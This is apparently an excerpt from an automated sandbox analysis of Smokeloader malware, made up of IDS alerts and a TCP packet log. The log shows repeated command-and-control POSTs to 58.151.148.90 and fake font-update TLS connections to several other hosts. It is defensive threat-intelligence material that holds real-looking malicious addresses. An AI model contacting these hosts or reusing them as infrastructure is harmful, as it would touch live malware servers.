                                                                                                                                                                                2024-12-30T19:42:50.395023+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975458.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:52.207696+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975558.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:53.672878+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975758.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:42:55.177365+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975858.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:43:07.643862+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44976023.145.40.181443TCP
                                                                                                                                                                                2024-12-30T19:43:09.099716+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44984158.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:43:10.550269+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44984958.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:43:12.024918+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44985958.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:43:13.485834+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44986958.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:43:15.049252+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44988058.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:43:16.522075+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44989158.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:43:18.168833+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44990158.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:43:19.670064+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44991258.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:43:21.135846+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44992358.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:43:22.603639+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44993158.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:43:24.081589+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44994158.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:43:25.585791+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44995158.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:44:08.353051+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44996223.145.40.181443TCP
                                                                                                                                                                                2024-12-30T19:44:55.486527+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004058.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:44:57.052287+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004158.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:44:58.529236+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004258.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:00.019203+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004358.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:01.707328+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004458.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:03.192960+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004558.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:04.796958+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004658.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:06.282513+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004758.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:07.746326+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004858.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:09.281261+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004958.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:10.243183+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.45005051.79.230.147443TCP
                                                                                                                                                                                2024-12-30T19:45:18.689928+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45005158.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:20.211488+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45005258.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:21.698461+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45005358.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:23.176825+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45005458.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:24.673637+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45005558.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:26.125995+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45005658.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:27.932092+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45005758.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:29.410428+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45005858.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:30.888815+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45005958.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:32.675599+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006058.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:34.174731+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006158.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:35.676528+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006258.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:37.142096+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006358.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:37.881439+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450064192.185.146.136443TCP
                                                                                                                                                                                2024-12-30T19:45:40.839738+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006558.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:42.293796+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006658.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:43.757379+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006858.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:45.285811+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006958.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:47.149474+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45007058.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:51.685577+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45007258.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:53.145325+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45007458.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:54.619208+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45007558.151.148.9080TCP
                                                                                                                                                                                2024-12-30T19:45:55.393275+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.45007645.118.248.184443TCP
                                                                                                                                                                                2024-12-30T19:46:03.408545+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45007958.151.148.9080TCP

                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                TCP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Dec 30, 2024 19:42:22.092034101 CET4973680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:22.096796989 CET804973658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:22.096879959 CET4973680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:22.097021103 CET4973680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:22.097083092 CET4973680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:22.101943970 CET804973658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:22.101953030 CET804973658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:23.661969900 CET804973658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:23.662482023 CET804973658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:23.662544012 CET4973680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:23.663429022 CET4973680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:23.666085958 CET4973780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:23.668226957 CET804973658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:23.671005011 CET804973758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:23.671086073 CET4973780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:23.671211958 CET4973780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:23.671245098 CET4973780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:23.676001072 CET804973758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:23.676147938 CET804973758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:25.118741989 CET804973758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:25.118784904 CET804973758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:25.118879080 CET4973780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:25.119117975 CET4973780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:25.122999907 CET4973880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:25.124382019 CET804973758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:25.128237009 CET804973858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:25.128319979 CET4973880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:25.128454924 CET4973880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:25.128479004 CET4973880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:25.133176088 CET804973858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:25.133335114 CET804973858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:26.598766088 CET804973858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:26.599018097 CET804973858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:26.599116087 CET4973880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:26.599162102 CET4973880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:26.602644920 CET4973980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:26.603940964 CET804973858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:26.607512951 CET804973958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:26.607645988 CET4973980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:26.607853889 CET4973980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:26.607887030 CET4973980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:26.612658024 CET804973958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:26.612668991 CET804973958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:28.066045046 CET804973958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:28.066185951 CET804973958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:28.066270113 CET4973980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:28.066329956 CET4973980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:28.069377899 CET4974080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:28.071149111 CET804973958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:28.074213028 CET804974058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:28.074295044 CET4974080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:28.074415922 CET4974080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:28.074431896 CET4974080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:28.079152107 CET804974058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:28.079286098 CET804974058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:29.526232004 CET804974058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:29.526348114 CET804974058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:29.526498079 CET4974080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:29.526530027 CET4974080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:29.529026985 CET4974180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:29.531286001 CET804974058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:29.533859015 CET804974158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:29.533951044 CET4974180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:29.534080029 CET4974180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:29.534080029 CET4974180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:29.538799047 CET804974158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:29.538921118 CET804974158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:31.023500919 CET804974158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:31.023631096 CET804974158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:31.023710012 CET4974180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:31.023792982 CET4974180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:31.026015043 CET4974280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:31.028527975 CET804974158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:31.030883074 CET804974258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:31.030986071 CET4974280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:31.031085014 CET4974280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:31.031085014 CET4974280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:31.035810947 CET804974258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:31.036015034 CET804974258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:32.476174116 CET804974258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:32.476277113 CET804974258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:32.476346970 CET4974280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:32.477812052 CET4974280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:32.480874062 CET4974380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:32.482621908 CET804974258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:32.485738039 CET804974358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:32.485858917 CET4974380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:32.486035109 CET4974380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:32.486073971 CET4974380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:32.490834951 CET804974358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:32.491009951 CET804974358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:33.955096006 CET804974358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:33.955260038 CET804974358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:33.955333948 CET4974380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:33.955408096 CET4974380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:33.958265066 CET4974480192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:33.960165977 CET804974358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:33.963114023 CET804974458.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:33.963205099 CET4974480192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:33.963368893 CET4974480192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:33.963427067 CET4974480192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:33.968147993 CET804974458.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:33.968280077 CET804974458.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:35.390779018 CET804974458.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:35.391216040 CET804974458.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:35.391273975 CET4974480192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:35.391324043 CET4974480192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:35.395555019 CET4974580192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:35.396146059 CET804974458.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:35.400407076 CET804974558.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:35.400480032 CET4974580192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:35.400616884 CET4974580192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:35.400640011 CET4974580192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:35.405503035 CET804974558.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:35.405514002 CET804974558.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:36.871290922 CET804974558.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:36.871599913 CET804974558.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:36.871674061 CET4974580192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:36.871706009 CET4974580192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:36.873960018 CET4974680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:36.876533985 CET804974558.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:36.878810883 CET804974658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:36.882632017 CET4974680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:36.882741928 CET4974680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:36.882775068 CET4974680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:36.887518883 CET804974658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:36.887528896 CET804974658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:38.355526924 CET804974658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:38.356471062 CET804974658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:38.356537104 CET4974680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:38.356590986 CET4974680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:38.358810902 CET4974780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:38.361373901 CET804974658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:38.363581896 CET804974758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:38.363656044 CET4974780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:38.363780022 CET4974780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:38.363797903 CET4974780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:38.368530035 CET804974758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:38.368628025 CET804974758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:40.058830976 CET804974758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:40.059043884 CET804974758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:40.059112072 CET4974780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:40.059150934 CET4974780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:40.061383963 CET4974880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:40.063910007 CET804974758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:40.066272020 CET804974858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:40.066349983 CET4974880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:40.066457033 CET4974880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:40.066488981 CET4974880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:40.071213961 CET804974858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:40.071419001 CET804974858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:41.554379940 CET804974858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:41.554615021 CET804974858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:41.554692030 CET4974880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:41.554765940 CET4974880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:41.557848930 CET4974980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:41.559520960 CET804974858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:41.562674046 CET804974958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:41.562762976 CET4974980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:41.562881947 CET4974980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:41.562881947 CET4974980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:41.567748070 CET804974958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:41.567758083 CET804974958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:43.007309914 CET804974958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:43.007767916 CET804974958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:43.007850885 CET4974980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:43.008006096 CET4974980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:43.010334969 CET4975080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:43.012829065 CET804974958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:43.015181065 CET804975058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:43.015256882 CET4975080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:43.015362024 CET4975080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:43.015408993 CET4975080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:43.020136118 CET804975058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:43.020251036 CET804975058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:44.454025984 CET804975058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:44.454240084 CET804975058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:44.454560041 CET4975080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:44.454628944 CET4975080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:44.459428072 CET804975058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:44.461744070 CET4975180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:44.466577053 CET804975158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:44.466808081 CET4975180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:44.466878891 CET4975180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:44.466922045 CET4975180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:44.471612930 CET804975158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:44.471770048 CET804975158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:45.942068100 CET804975158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:45.942276955 CET804975158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:45.942342997 CET4975180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:45.942384958 CET4975180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:45.944623947 CET4975280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:45.947129965 CET804975158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:45.949455976 CET804975258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:45.949536085 CET4975280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:45.949636936 CET4975280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:45.949654102 CET4975280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:45.954442978 CET804975258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:45.954503059 CET804975258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:47.461075068 CET804975258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:47.461309910 CET804975258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:47.461369038 CET4975280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:47.461421967 CET4975280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:47.464580059 CET4975380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:47.466334105 CET804975258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:47.469448090 CET804975358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:47.469515085 CET4975380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:47.469727039 CET4975380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:47.469742060 CET4975380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:47.474457026 CET804975358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:47.474668980 CET804975358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:48.939321041 CET804975358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:48.939601898 CET804975358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:48.939672947 CET4975380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:48.939734936 CET4975380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:48.944467068 CET4975480192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:42:48.944978952 CET804975358.151.148.90192.168.2.4
